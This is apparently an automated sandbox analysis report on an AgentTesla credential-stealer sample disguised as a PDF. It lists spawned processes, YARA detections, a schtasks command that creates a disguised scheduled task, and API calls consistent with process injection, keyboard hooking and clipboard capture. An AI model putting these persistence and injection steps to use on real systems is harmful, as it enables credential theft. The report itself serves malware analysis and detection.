                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:19
                              Start time:08:42:33
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                              Imagebase:0xd40000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.1620262791.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.1620262791.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.1620262791.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              Target ID:21
                              Start time:08:42:40
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                              Imagebase:0x310000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:22
                              Start time:08:42:41
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp26DE.tmp"
                              Imagebase:0xc00000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:23
                              Start time:08:42:41
                              Start date:25/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:24
                              Start time:08:42:41
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                              Imagebase:0xc30000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3861351736.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:false


                                Execution Graph

                                Execution Coverage:10.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:108
                                Total number of Limit Nodes:4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448591434.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_50b0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: db95da23d3b7e3afeaf6b6566d78a9f55c6fbddf96ed73b322774ced9569acf6
                                • Instruction ID: f4997b328af0c5eb47a89241aa98061a8b3b82e563062164acef5913bcb0cb4e
                                • Opcode Fuzzy Hash: db95da23d3b7e3afeaf6b6566d78a9f55c6fbddf96ed73b322774ced9569acf6
                                • Instruction Fuzzy Hash: F2416C74E092098FEB48CFA9E8806EEFBF7AF89301F18D469D419A7251D7744901CB54
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fa2f4f442b869272919a87b786acf105f9c12d80c3a60c5f24cea0bd7fb46f07
                                • Instruction ID: f5217d3eb6a11cdd138194b912b08160ef0e973438642ca77b14cba0ce774283
                                • Opcode Fuzzy Hash: fa2f4f442b869272919a87b786acf105f9c12d80c3a60c5f24cea0bd7fb46f07
                                • Instruction Fuzzy Hash: F7C08051D9D0C4C9C50409C474000F8F77CC94F911F0B34B28D4F5718253004126410C

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0102D536
                                • GetCurrentThread.KERNEL32 ref: 0102D573
                                • GetCurrentProcess.KERNEL32 ref: 0102D5B0
                                • GetCurrentThreadId.KERNEL32 ref: 0102D609
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0102D536
                                • GetCurrentThread.KERNEL32 ref: 0102D573
                                • GetCurrentProcess.KERNEL32 ref: 0102D5B0
                                • GetCurrentThreadId.KERNEL32 ref: 0102D609
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07110ECE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07110ECE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0102B35E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 010259C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 010259C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                APIs
                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 071106A0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                APIs
                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 071106A0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0102D787
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                APIs
                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07110780
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071104F6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                APIs
                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07110780
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071104F6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0102D787
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                APIs
                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 071105BE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                APIs
                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 071105BE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448591434.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                Similarity
                                • API ID: ResumeThread
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0102B35E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1020000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07115175
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07115175
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0

                                Execution Graph

                                Execution Coverage:11.6%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:214
                                Total number of Limit Nodes:22

                                Control-flow Graph

                                APIs
                                • DeleteFileW.KERNEL32(00000000), ref: 026580B0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3859073445.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2650000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 064A5EAA
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 064A5EAA
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 064AABE9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0

                                Control-flow Graph (graph not recoverable): block 64ab290-64ab908 calls OleGetClipboard
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0

                                Control-flow Graph (graph not recoverable): block 64ab8ca-64ab908 calls OleGetClipboard
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 064A9D1F
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 064A9D1F
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                APIs
                                • DeleteFileW.KERNEL32(00000000), ref: 026580B0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3859073445.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2650000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 064AD42B
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 064AD42B
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                APIs
                                • DeleteFileW.KERNEL32(00000000), ref: 026580B0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3859073445.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2650000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32 ref: 0265EFDF
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3859073445.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2650000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 064A4D56
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 064A4D56
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,064AAE35), ref: 064AAEBF
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 064AB77D
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 064AB77D
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,064AAE35), ref: 064AAEBF
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 064AB77D
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3902842745.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6bb0000_z38PO_20248099-1_pdf.jbxd
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f6563685f048aba60cc489532769d25d61618ee9a7170ebeab414e46e034881b
                                • Instruction ID: 6e68d7885bc41212dfd101ce622cb83c1d5b433bec007a1a982252b1a9ea5328
                                • Opcode Fuzzy Hash: f6563685f048aba60cc489532769d25d61618ee9a7170ebeab414e46e034881b
                                • Instruction Fuzzy Hash: 17913174F506099FDB94DB69D8607AE7BB2BB88310F5085AAC409EB348EF709D418B91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5bef7507a878dfe1ba6ab5d9525ae8bff92a3e5391816e072b1cf3cfa57d8726
                                • Instruction ID: 829aabfcc29f09feae77546fa315effa4c58e0d4302e48a5fe0f5bc9dec28bd1
                                • Opcode Fuzzy Hash: 5bef7507a878dfe1ba6ab5d9525ae8bff92a3e5391816e072b1cf3cfa57d8726
                                • Instruction Fuzzy Hash: 7B61A1B5F001104FDB519BAEC88066FAAE7AFC4620B25847AD80ADB360DF75EC0287D1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4ed0801ee6c5cd90d99386d3b92854a6399cc5a88e982e77b6f726840ead38a
                                • Instruction ID: 1d17c0194ee08d11d9033fa9df965fe797c5ddffa136c128d97ad0b688139bdd
                                • Opcode Fuzzy Hash: a4ed0801ee6c5cd90d99386d3b92854a6399cc5a88e982e77b6f726840ead38a
                                • Instruction Fuzzy Hash: BA816E74B006098FDB95DFB8D5A079EBBF2BB89310F208529D509DB354EB35DC428B91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de294bf68dc1a8904d781a9eec3c1b41d314a67b0202750885138e6253828714
                                • Instruction ID: 5579e2a8b164a9d91e1103aa0614b2c3e98728ca95435312604508a5af39cdf2
                                • Opcode Fuzzy Hash: de294bf68dc1a8904d781a9eec3c1b41d314a67b0202750885138e6253828714
                                • Instruction Fuzzy Hash: 57914C34E102198BDB61DF68C890B9DB7B1FF89310F20869AD549BB385DB70AA85CF51
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b42f64a80a1ff7e910775c4f71f5cd5810fa013a1ec085307d06ca6d9a0bbaf7
                                • Instruction ID: edb1c66636b2d36f7ac25ff6b770802b4c314b8a29d8f7a77845dcbe979a5181
                                • Opcode Fuzzy Hash: b42f64a80a1ff7e910775c4f71f5cd5810fa013a1ec085307d06ca6d9a0bbaf7
                                • Instruction Fuzzy Hash: DF914034E106198BDF61DF68C990B9DB7B1FF89310F20859AD549BB384DB70A985CF50
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8024fa69d036377039b294ba10568d9c033d925c5ccc30b6dd4f44832bad164d
                                • Instruction ID: 8c63e54507da04f0b54f83f3e7535053c047bbfcc95198c7c72989d1c040e20b
                                • Opcode Fuzzy Hash: 8024fa69d036377039b294ba10568d9c033d925c5ccc30b6dd4f44832bad164d
                                • Instruction Fuzzy Hash: ED717D34A002089FDB94DFA9D990A9EBBF6FF88310F24856AD405AB354DB35EC46CB50
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b0de18f4b45ad76c07319c31f9e331ce7fc03217d9388e5163961820cfe371a0
                                • Instruction ID: fbf41aed08f0119ae2c6179b699a70c264d23f7d20bc9599a3d0d06911bc2709
                                • Opcode Fuzzy Hash: b0de18f4b45ad76c07319c31f9e331ce7fc03217d9388e5163961820cfe371a0
                                • Instruction Fuzzy Hash: CB715A34A002089FDB94DFA9D990A9EBBF6FF88310F24846AD405AB354DB34EC46CB50
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3e9a6df86e94ecabed9bea80846103732e92dd084195044efb7022ac7fe22890
                                • Instruction ID: 498ff7b3be6bf41e95920e063c86c3379f36f60501e09588b7c9b0d42c531c00
                                • Opcode Fuzzy Hash: 3e9a6df86e94ecabed9bea80846103732e92dd084195044efb7022ac7fe22890
                                • Instruction Fuzzy Hash: AF616B34F002199FEB559FA8D8147AEBAF7FB88310F20846AD506AB394DB758C458F90
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 90a0b20e4074cba28f28a27f57e7cb3560e4dfa121b6868b4cd0fcf2d31ed46e
                                • Instruction ID: d20a6dce2e8de0a29ec38c9d9303d3d9df21601d5a4517a53f8d39370bb530d9
                                • Opcode Fuzzy Hash: 90a0b20e4074cba28f28a27f57e7cb3560e4dfa121b6868b4cd0fcf2d31ed46e
                                • Instruction Fuzzy Hash: 0751D339E001049FDFD4EB68E4446AEB7B3EF88325F10886ED516D7391DB398859CB80
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8c68aaca6ddb5c8811f6c7605c6ffb107a08cdfc6fa0b65278e0d023ca124aa6
